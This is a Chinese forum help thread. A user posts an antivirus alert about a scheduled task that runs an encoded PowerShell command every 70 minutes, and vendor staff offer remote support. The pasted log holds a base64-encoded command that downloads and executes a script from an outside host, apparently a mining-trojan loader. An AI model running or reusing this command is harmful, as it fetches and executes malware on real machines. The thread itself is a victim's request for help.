每隔70分钟就弹出利用PowerShell执行可疑脚本…

棠伯 · 发表于 2020-3-31 19:30:23

【1】2020-03-31 18:50:06,系统防护,系统加固,svchost.exe触犯敏感动作防护规则, 结束进程
操作进程：C:\Windows\system32\svchost.exe
命令行：C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
父进程：C:\Windows\system32\services.exe
防护项目：利用PowerShell执行可疑脚本
执行文件：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行：powershell.exe -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGEAZABkAHIAZQBzAHMAbgBlAHQALgBkAG8ALgBhAG0ALwBlAGMALgB0AHgAdAAnACkAKQA=
操作结果：结束进程

复制代码

就是这个，从开机开始，每隔70分钟就执行一次，虽然被拦下来了但是全盘扫描查不出来…进入安全模式全盘扫描了一遍也查不出来，而且百度了一下那个命令行结果全是挖矿木马人都傻了…
虽然现在没啥影响，但是每70分钟就跳出来一次心里总归不舒服，百度了一大堆看都看不懂，自己就不是那块料…
有别的解决办法吗…真不想重装系统啊…

棠伯 · 发表于 2020-3-31 21:57:20

Nobuchika 发表于 2020-3-31 21:17
保留現場，明天上班時間會有官方跟進查看的

因为网课的关系要用到电脑…应该没问题吧…

棠伯 · 发表于 2020-4-1 10:40:18

火绒运营专员发表于 2020-4-1 10:12
您好，麻烦您添加QQ：2208613431，我们远程看下问题，感谢您的反馈！

刚加上